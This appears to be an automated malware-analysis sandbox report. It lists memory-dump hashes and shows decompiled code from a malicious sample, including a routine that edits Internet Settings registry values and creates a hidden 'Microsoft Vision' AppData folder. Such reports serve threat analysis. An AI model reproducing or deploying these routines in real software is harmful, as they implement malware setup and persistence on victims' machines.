                                  • Opcode Fuzzy Hash: 71d600bae22622305c5e2c51d556ab8b3dfe97409be277b3f2e39a9cb7f9e9ba
                                  • Instruction Fuzzy Hash: 0BE0D87264030067D2508F079C46F53F758DB45A70F08C56BED0C1B701E176B50489F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117563744.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bca1d18d307493f507ea7c94575be01a661460ee5b5229d9363db0e83524cb73
                                  • Instruction ID: e307eb7458e634adbefb94c815efbefd90b0da85bebcd53f8f79c687b5ba8bef
                                  • Opcode Fuzzy Hash: bca1d18d307493f507ea7c94575be01a661460ee5b5229d9363db0e83524cb73
                                  • Instruction Fuzzy Hash: C3E0207164030067D350DF079C46B53FB58EB45A70F44C567ED0C1B702E176B50489F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117563744.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c9c5857b690850f1963368fab65002d38878e053492db4de38e03c901cb0c167
                                  • Instruction ID: c2de02150dd10e04c0d6c7bf62aeeb47b7eee5e4e9750c176cb3007006f45261
                                  • Opcode Fuzzy Hash: c9c5857b690850f1963368fab65002d38878e053492db4de38e03c901cb0c167
                                  • Instruction Fuzzy Hash: 2FE0D87264030067D250CF069C46F53F758DB45A70F04C56BED0C1B741F176B50489F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1125d316856c2c8e3248ede5e1525a478d3a6d35b65d760a6d1de19d0a5539dc
                                  • Instruction ID: 3b675ad66516a6c33f47437030d5f4b0de54ed597f9d03018e1b9318aeffb8d1
                                  • Opcode Fuzzy Hash: 1125d316856c2c8e3248ede5e1525a478d3a6d35b65d760a6d1de19d0a5539dc
                                  • Instruction Fuzzy Hash: C9F03074E1110CEBCB08EBE4D952A5DB775AF41301F7041A8D80577395DB306F59CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b52bb0a49cc66ac228cb157c284baf4c7f6c1f18c8cb133ea177e0a900aa2ac1
                                  • Instruction ID: 0c1dfc31623b6d907c871c1f3d572d5d61692dd7e0224274c299b3343cd27481
                                  • Opcode Fuzzy Hash: b52bb0a49cc66ac228cb157c284baf4c7f6c1f18c8cb133ea177e0a900aa2ac1
                                  • Instruction Fuzzy Hash: 5EF03238C02218DFCB04EFB8EA486AEBBB0FF46301F1045A9D814A3350DB749A00CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117803755.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ccbee9759d78d8a91941df80b6ee1a80e99ad850c16f586abe78c5de7725941a
                                  • Instruction ID: 2703124987af0489096be7446d0e1cf533be11cb491247b40ae50101a5025971
                                  • Opcode Fuzzy Hash: ccbee9759d78d8a91941df80b6ee1a80e99ad850c16f586abe78c5de7725941a
                                  • Instruction Fuzzy Hash: 9FF0E2709002698FCB64DB24CD88B9CBBB2FB88311F2082D9911DAA291CB749E81CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117803755.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1bf7af0553bdaad9b6803098674cfd9309ae49172c7771a0544549e8f3e43f4
                                  • Instruction ID: 2fa71f8588236a67d7ee2d5826f8904e4dd764fbecddaad9fc28c84509b0f889
                                  • Opcode Fuzzy Hash: d1bf7af0553bdaad9b6803098674cfd9309ae49172c7771a0544549e8f3e43f4
                                  • Instruction Fuzzy Hash: 3AF0AF759011299FDBA0DF64C984FD8BBB5FB48304F1484DAD409A7251DB329A86DF04
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117803755.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 27db0c85df08166186153ca1a37947e4773391706d9c07a26b9e8e61c4f20152
                                  • Instruction ID: 62c19a0cd91e69ca0c43d00f763e58e23c792ff63e64851a805fd514723cf7a9
                                  • Opcode Fuzzy Hash: 27db0c85df08166186153ca1a37947e4773391706d9c07a26b9e8e61c4f20152
                                  • Instruction Fuzzy Hash: 74F0F2759042199FCB10CF90C840BEDFBB8FB48304F0481AA9519EB281D334AA86CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 78fc60e3c7d8d087a26eddabcb0dcc2626a9d8a73ce1d442a9e634c7fcd6fc76
                                  • Instruction ID: 24d3f7fd189b65906db8304952af1527a5c2d269da63f68802279c5c4af61bb5
                                  • Opcode Fuzzy Hash: 78fc60e3c7d8d087a26eddabcb0dcc2626a9d8a73ce1d442a9e634c7fcd6fc76
                                  • Instruction Fuzzy Hash: 59F03974C0020CAFCF01EFA8D840AADBBB1FB48300F1084AAEC14A3250D7314A60DF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117803755.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8bc20243b93591b247eae8d6ead7e4151051eeda018292c017a9cc0151452fe3
                                  • Instruction ID: 618802b08a3cda4c654f41f548dd9869d0ba1d2ee92945b2a193401ff6e357aa
                                  • Opcode Fuzzy Hash: 8bc20243b93591b247eae8d6ead7e4151051eeda018292c017a9cc0151452fe3
                                  • Instruction Fuzzy Hash: 53F0D4749002189FCB60CFA4C850B9CFBB1BB49300F20809AAA19AB395D7365E52CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 088e6acb1b4942814f4fe95583bbd8b82e1c804bb8916a372b14b5c310f03a6a
                                  • Instruction ID: 86f151911bba0f4c3455d800a91f4eab82e5c2aa7114a70c54633a4628c8db86
                                  • Opcode Fuzzy Hash: 088e6acb1b4942814f4fe95583bbd8b82e1c804bb8916a372b14b5c310f03a6a
                                  • Instruction Fuzzy Hash: 8AE04F38906308DFCB04DFA4E54895DBBB5BB45301F1051A9D84593750D7715E59DB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 715e827810d0dd166fa0fac6d68d473de3686c9b45614d372339db41424a3a0e
                                  • Instruction ID: dbf03bd6152eb173501f75148b85ec13174452792e9b106e5cd12b0eab510ca5
                                  • Opcode Fuzzy Hash: 715e827810d0dd166fa0fac6d68d473de3686c9b45614d372339db41424a3a0e
                                  • Instruction Fuzzy Hash: 2BE08C34D0620CEFCB04EFA0EA499ADBB75FB46301F2091A9EC4427350CB30AA58DB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117803755.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8db71910a3ac85bb3a0022650c0018e30ab1e87be77aed98a3f727f12e196ce9
                                  • Instruction ID: 4ab07554826656760fbe2eeb057ba6efcbea6aeb60a229a6da5d63cbbd85b3e0
                                  • Opcode Fuzzy Hash: 8db71910a3ac85bb3a0022650c0018e30ab1e87be77aed98a3f727f12e196ce9
                                  • Instruction Fuzzy Hash: ACE04F30C1D2848FCB56AFB8A8453997FB0AF52205F2445EEC949A2692D6354658CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d5fd999f4ace64316a1d8f7faa7a5247495fef1e68ead9067d088382d8a5a6cb
                                  • Instruction ID: aed01369bd5a82bafe4e03770d0ddb35bc8818595e2c778b6b4f02db38e77739
                                  • Opcode Fuzzy Hash: d5fd999f4ace64316a1d8f7faa7a5247495fef1e68ead9067d088382d8a5a6cb
                                  • Instruction Fuzzy Hash: DCD01739D05209CBCB04CFA8E8882ECBBB0FB88329F209426C118A3240C33149458F50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117803755.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 08f0c6392b1997d3a18be511d139083564088a59528ef1524b7ac63a215e9cb8
                                  • Instruction ID: 42e5a9fe81b8363aca84b43108dffe1c6d50574af25c5c4d0e3416100efc7fd0
                                  • Opcode Fuzzy Hash: 08f0c6392b1997d3a18be511d139083564088a59528ef1524b7ac63a215e9cb8
                                  • Instruction Fuzzy Hash: B2E0E5799002298FCB54DF50C880BA8BBB1FB48300F1044DAC809AA295C7399B82DF00
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117803755.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b9a939af249d0d9f544cb5658dab891aeeb7028ee0e5b01541e8cac15801b2d
                                  • Instruction ID: e60384486f02714694aef369ee694c79b4a75dc750117594f776d8a292037d38
                                  • Opcode Fuzzy Hash: 8b9a939af249d0d9f544cb5658dab891aeeb7028ee0e5b01541e8cac15801b2d
                                  • Instruction Fuzzy Hash: D9D05E308112089FC715EFF8A84939977B5AB41301F6040F9C90892290EA364A84CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c6f60cf6c3d3adf137551af742718bf1e682f6d930327ac84108487eb2bd412
                                  • Instruction ID: 14b1809406eda050ca64a93c8214b46e60829fdb2ff145048f110023a1475d51
                                  • Opcode Fuzzy Hash: 7c6f60cf6c3d3adf137551af742718bf1e682f6d930327ac84108487eb2bd412
                                  • Instruction Fuzzy Hash: CBE0ECB5D0574A8A8B18CFA781410AEFFB2AFC9314F15D4268445AA629D73441518B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e00323e27a7e536d3aed420ad320b2e9c6e46f93943af4bb06a1a887e482c2f
                                  • Instruction ID: 32473ad0af24a0479c0b28361190c6f05ddcc2f8cedf5e0c3ef4de66f2b6949e
                                  • Opcode Fuzzy Hash: 6e00323e27a7e536d3aed420ad320b2e9c6e46f93943af4bb06a1a887e482c2f
                                  • Instruction Fuzzy Hash: 4ED0C77494630CDBC719FB94D94665D7768EB81301F6040E8D80453691DB712F14D796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117504430.0000000000232000.00000040.00000001.sdmp, Offset: 00232000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f343e9caac480e4574fec4c8375f1a16bb257b2a7982838d20c0c58b6aea703
                                  • Instruction ID: 553d9166d991dcb4b59e41fbe611fb5241d6c79c97bf217f3ecd3cb7ad236a86
                                  • Opcode Fuzzy Hash: 9f343e9caac480e4574fec4c8375f1a16bb257b2a7982838d20c0c58b6aea703
                                  • Instruction Fuzzy Hash: 2ED05EB9214A928FD7168E1CC1A4B9537D4AB51B04F4644F9A800CB6A3C768E996D200
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 15b37a1326e30692f3300362df0a078706531b0598edd45a7d2662b43ccee8d5
                                  • Instruction ID: d05be25a4949a081dcb4586b291b462d5e84fae39be8b7a8557f567c35cb804b
                                  • Opcode Fuzzy Hash: 15b37a1326e30692f3300362df0a078706531b0598edd45a7d2662b43ccee8d5
                                  • Instruction Fuzzy Hash: 54D0A7B14192449A8F208FA0E55459ABBB0EB593547241463C421DD05CC3314541DF52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6395549b86c121921586b486d4b193468591849d421c3c3ea7f1297c835f8036
                                  • Instruction ID: e21bb40abce101e10d7eb6ed2add933c98cb098ffaaeb43864fe83ff063818a8
                                  • Opcode Fuzzy Hash: 6395549b86c121921586b486d4b193468591849d421c3c3ea7f1297c835f8036
                                  • Instruction Fuzzy Hash: 38D01234402208AFD311EFB5FC4D6697BECEB47212F1441A5D809C3161EB3249C0DBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd190c9392041501fde8ff5b571a0b34306c72a0823be25263132d91073c2c32
                                  • Instruction ID: cbecd629332b88f96e133aa6077f7a8fef6bf6ceba3e714fd4108b07abe954a8
                                  • Opcode Fuzzy Hash: cd190c9392041501fde8ff5b571a0b34306c72a0823be25263132d91073c2c32
                                  • Instruction Fuzzy Hash: 77D0C93AE05118CFCB04CFA8E8441DCF771FB8922AB209066C518B3210C7319915CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7590dd2b32613d7ff4208ed06f58988c0fbb23730520ec597ca12aae38052d10
                                  • Instruction ID: 31bf71f21b5e88cc1b69fdce2239b3a004056c534f5044e0531caf32c9bb4e43
                                  • Opcode Fuzzy Hash: 7590dd2b32613d7ff4208ed06f58988c0fbb23730520ec597ca12aae38052d10
                                  • Instruction Fuzzy Hash: 11D01275D0564A8F8708CFE3C14009EFFB2AFC9300F55D4678805EB219E23402018B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6cbf20a192617a0a8248f1471f7e6bc54488770ec2ac6f577823fa6a3a423eb
                                  • Instruction ID: 3c77716545d319f5a96882e7172f59b4b6068c98642da08346ba9c0ab859c091
                                  • Opcode Fuzzy Hash: c6cbf20a192617a0a8248f1471f7e6bc54488770ec2ac6f577823fa6a3a423eb
                                  • Instruction Fuzzy Hash: DBE0927091232ADFEB54DF24EC84F9CFBB2FB45240F54569A9409B7264EB301A85DF10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117504430.0000000000232000.00000040.00000001.sdmp, Offset: 00232000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f22576383bea117ae0c1c9fb948aeb730dd9e55bf6efda70580f3cbebe8c58b
                                  • Instruction ID: 16daf0bcd18155a4c72ab5af9a3f95eab29cba1c2ba965ee2137a206dd23c7cc
                                  • Opcode Fuzzy Hash: 9f22576383bea117ae0c1c9fb948aeb730dd9e55bf6efda70580f3cbebe8c58b
                                  Non-executed Functions

                                  Executed Functions

                                  C-Code - Quality: 59%
                                  			E004148B6(intOrPtr __ecx) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				void* _v16;
                                  				signed int _v20;
                                  				char _v24;
                                  				intOrPtr _v28;
                                  				signed short* _v36;
                                  				char _v44;
                                  				signed int* _t43;
                                  				intOrPtr* _t47;
                                  				void* _t48;
                                  				intOrPtr* _t50;
                                  				intOrPtr* _t54;
                                  				signed int _t57;
                                  				char _t60;
                                  				signed int _t61;
                                  				intOrPtr* _t63;
                                  				signed int _t64;
                                  				intOrPtr* _t66;
                                  				intOrPtr* _t67;
                                  				intOrPtr* _t70;
                                  				intOrPtr* _t71;
                                  				void* _t73;
                                  				signed int _t76;
                                  				signed int _t85;
                                  				signed int _t87;
                                  				signed short* _t88;
                                  
                                  				_t87 = 0;
                                  				_v28 = __ecx;
                                  				__imp__CoInitialize(0); // executed
                                  				_t43 =  &_v12;
                                  				_v16 = 0;
                                  				_v12 = 0;
                                  				_v8 = 0;
                                  				__imp__CoCreateInstance(0x417600, 0, 1, 0x41a77c, _t43); // executed
                                  				_t66 = _v12;
                                  				if(_t66 != 0) {
                                  					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x4175f0,  &_v8, 0);
                                  					_t67 = _v8;
                                  					if(_t67 != 0) {
                                  						 *((intOrPtr*)( *_t67 + 0x14))(_t67);
                                  						_t64 = 0;
                                  						while(1) {
                                  							_t47 = _v8;
                                  							_t34 =  &_v24; // 0x414222
                                  							_v20 = _t87;
                                  							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1, _t34,  &_v20);
                                  							if(_t48 != 0) {
                                  								break;
                                  							}
                                  							_t11 =  &_v24; // 0x414222
                                  							_t50 =  *_t11 + _t64 * 4;
                                  							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x417580,  &_v16);
                                  							if(_t48 != 0) {
                                  								break;
                                  							}
                                  							__imp__#8( &_v44);
                                  							_t54 = _v16;
                                  							_push(_t87);
                                  							_push( &_v44);
                                  							_push(L"Description");
                                  							_push(_t54);
                                  							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
                                  								L6:
                                  								_t73 = 0x1c;
                                  								if(E00406099(_t73) == 0) {
                                  									_t85 = _t87;
                                  								} else {
                                  									_t85 = E00414B6E(_t56);
                                  								}
                                  								_t88 = _v36;
                                  								_t57 =  *_t88 & 0x0000ffff;
                                  								if(_t57 == 0) {
                                  									L12:
                                  									 *(_t85 + 8) = _t64;
                                  									E00402503(_v28 + 4, _t85);
                                  									_t64 = _t64 + 1;
                                  									_t87 = 0;
                                  									continue;
                                  								} else {
                                  									_t76 = _t57;
                                  									do {
                                  										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
                                  										_t60 =  *_t88;
                                  										_t88 =  &(_t88[1]);
                                  										 *((char*)(_t87 +  *_t85)) = _t60;
                                  										_t87 = _t87 + 1;
                                  										_t61 =  *_t88 & 0x0000ffff;
                                  										_t76 = _t61;
                                  									} while (_t61 != 0);
                                  									goto L12;
                                  								}
                                  							}
                                  							_t63 = _v16;
                                  							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
                                  							if(_t48 != 0) {
                                  								break;
                                  							}
                                  							goto L6;
                                  						}
                                  						_t70 = _v8;
                                  						if(_t70 != 0) {
                                  							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);
                                  							_v8 = _t87;
                                  						}
                                  						_t71 = _v12;
                                  						if(_t71 != 0) {
                                  							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);
                                  							_v12 = _t87;
                                  						}
                                  						__imp__CoUninitialize();
                                  						return _t48;
                                  					}
                                  				}
                                  				return _t43;
                                  			}

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 004148C5
                                  • CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?), ref: 004148E5
                                  • VariantInit.OLEAUT32(?), ref: 00414941
                                  • CoUninitialize.OLE32 ref: 00414A07
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CreateInitInitializeInstanceUninitializeVariant
                                  • String ID: "BA$Description$FriendlyName
                                  • API String ID: 4142528535-3217936966
                                  C-Code - Quality: 100%
                                  			E00406045(long __ecx) {
                                  				void* _t2;
                                  
                                  				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
                                  				return _t2;
                                  			}




                                  0x0040604f
                                  0x00406055

                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,?,004030E2,00405B80,?,?,0041191C,00405B80,?,?,74A313FB,00000000,?,00405B80,00000000), ref: 00406048
                                  • RtlAllocateHeap.NTDLL(00000000,?,0041191C,00405B80,?,?,74A313FB,00000000,?,00405B80,00000000), ref: 0040604F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  C-Code - Quality: 95%
                                  			E004154EB(void* __eflags) {
                                  				char _v592;
                                  				char _v608;
                                  				char _v1120;
                                  				short _v1140;
                                  				char _v1372;
                                  				intOrPtr _v1492;
                                  				char _v1496;
                                  				char _v1508;
                                  				char _v1512;
                                  				char _v1528;
                                  				intOrPtr _v1544;
                                  				intOrPtr _v1548;
                                  				intOrPtr _v1552;
                                  				intOrPtr _v1560;
                                  				intOrPtr _v1568;
                                  				intOrPtr _v1584;
                                  				intOrPtr _v1592;
                                  				char _v1596;
                                  				char _v1600;
                                  				intOrPtr _v1604;
                                  				int _v1608;
                                  				char _v1616;
                                  				char _v1620;
                                  				char _v1624;
                                  				void* _v1628;
                                  				char _v1632;
                                  				char _v1636;
                                  				char _v1648;
                                  				void* __edi;
                                  				void* _t57;
                                  				void* _t100;
                                  				void* _t103;
                                  				CHAR* _t116;
                                  				char* _t123;
                                  				CHAR* _t129;
                                  				void* _t133;
                                  
                                  				_v1616 = 0xa;
                                  				_v1608 = 0;
                                  				E00405D37( &_v1596);
                                  				E00412C11( &_v1508);
                                  				E004010AD(GetTickCount());
                                  				_v1648 = 0x104;
                                  				GetModuleFileNameA(0,  &_v1372, _t129);
                                  				_v1624 = 0;
                                  				_t57 = E004134A2( &_v1372,  &_v1624); // executed
                                  				_t128 = _v1624;
                                  				if(_v1624 == 0) {
                                  					L22:
                                  					E0041267D( &_v1508);
                                  					E00405D5C( &_v1596, _t129);
                                  					return 0;
                                  				} else {
                                  					_v1620 = 0;
                                  					E00413279(_t57, _t128, 0x215a,  &_v1620);
                                  					_t133 = 0x20;
                                  					_t129 = E00401085(_t133);
                                  					_t116 = _t129;
                                  					do {
                                  						 *_t116 = 0;
                                  						_t116 =  &(_t116[1]);
                                  						_t133 = _t133 - 1;
                                  					} while (_t133 != 0);
                                  					E0040102C(_t129,  &_v1620, 4);
                                  					 *0x559cb0 = CreateEventA(0, 0, 0, _t129);
                                  					if(GetLastError() == 0xb7) {
                                  						goto L22;
                                  					}
                                  					_t145 =  *0x559cb0;
                                  					if( *0x559cb0 == 0) {
                                  						goto L22;
                                  					}
                                  					RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1628,  &_v1608); // executed
                                  					RegSetValueExA(_v1628, "MaxConnectionsPer1_0Server", 0, 4,  &_v1616, 4); // executed
                                  					RegSetValueExA(_v1628, "MaxConnectionsPerServer", 0, 4,  &_v1616, 4); // executed
                                  					RegCloseKey(_v1628);
                                  					E00405B4E( &_v1596, _t128, _t145); // executed
                                  					E00412A7F( &_v1508, _t128, _t145,  &_v1596); // executed
                                  					_t119 =  &_v592;
                                  					E00405000( &_v592, _t128, _t145,  &_v1600,  &_v1512); // executed
                                  					E00401052( &_v1120, 0, 0x208);
                                  					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1120); // executed
                                  					lstrcatW( &_v1140, L"\\Microsoft Vision\\");
                                  					CreateDirectoryW( &_v1140, 0); // executed
                                  					if(_v1568 != 0 && E0041111B() != 1) {
                                  						_t103 = E00410A3C();
                                  						_t148 = _t103 - 0xa;
                                  						if(_t103 != 0xa) {
                                  							E00412F55(__eflags);
                                  						} else {
                                  							E0041313A(_t128, _t148);
                                  						}
                                  					}
                                  					if(_v1552 != 0) {
                                  						_t100 = E0041111B();
                                  						_t150 = _t100 - 1;
                                  						if(_t100 == 1) {
                                  							E00414F7E(_t119, _t150);
                                  						}
                                  					}
                                  					if(_v1548 != 0) {
                                  						E0040F073();
                                  					}
                                  					_t152 = _v1492;
                                  					if(_v1492 != 0) {
                                  						L18:
                                  						__eflags = _v1560;
                                  						if(__eflags != 0) {
                                  							E00413EBA();
                                  						}
                                  						E00404F74( &_v608, _t128, __eflags);
                                  						goto L21;
                                  					} else {
                                  						E004126DC( &_v1528, _t152, _v1592, _v1584, _v1544); // executed
                                  						_t153 = _v1604;
                                  						if(_v1604 == 0) {
                                  							goto L18;
                                  						}
                                  						_v1624 = 0;
                                  						_t123 =  &_v1632;
                                  						E0040373F(_t123,  &_v1496); // executed
                                  						_push(_t123);
                                  						E004120F8( &_v1624, _t153,  &_v1636,  &_v1628); // executed
                                  						E00405FEB(_v1648);
                                  						E00405FEB(0);
                                  						L21:
                                  						E00404C8D( &_v608, _t129, _t153);
                                  						goto L22;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 0041551D
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415539
                                    • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                    • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                    • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                    • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000), ref: 00413500
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004155A0
                                  • GetLastError.KERNEL32 ref: 004155AB
                                  • RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 004155E5
                                  • RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 00415604
                                  • RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00415619
                                  • RegCloseKey.ADVAPI32(?), ref: 0041561F
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041567B
                                  • lstrcatW.KERNEL32 ref: 0041568E
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0041569D
                                    • Part of subcall function 00412F55: CloseHandle.KERNEL32(?), ref: 00412F7F
                                    • Part of subcall function 00412F55: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,00405909,?,00000000,00000000,?,?,?,?,?,?), ref: 00412F99
                                    • Part of subcall function 00412F55: GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,00405909,?,00000000,00000000), ref: 00412FBE
                                    • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00412FE3
                                    • Part of subcall function 00412F55: lstrcatW.KERNEL32 ref: 00412FF7
                                    • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0041301B
